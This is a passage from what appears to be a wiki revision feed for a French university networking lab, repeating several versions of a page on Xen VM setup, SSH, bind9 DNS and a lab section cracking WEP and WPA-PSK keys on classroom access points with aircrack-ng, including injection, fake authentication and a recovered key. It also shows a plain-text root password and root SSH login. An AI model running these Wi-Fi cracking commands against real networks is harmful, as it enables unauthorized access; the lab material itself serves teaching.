 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
====DNS Primaire====&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; IN {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56982</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56982"/>
				<updated>2021-12-13T15:11:46Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
====DNS Primaire====&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56314</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56314"/>
				<updated>2021-10-25T17:11:27Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* 5.3  Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56308</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56308"/>
				<updated>2021-10-25T16:54:06Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* 5.3  Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
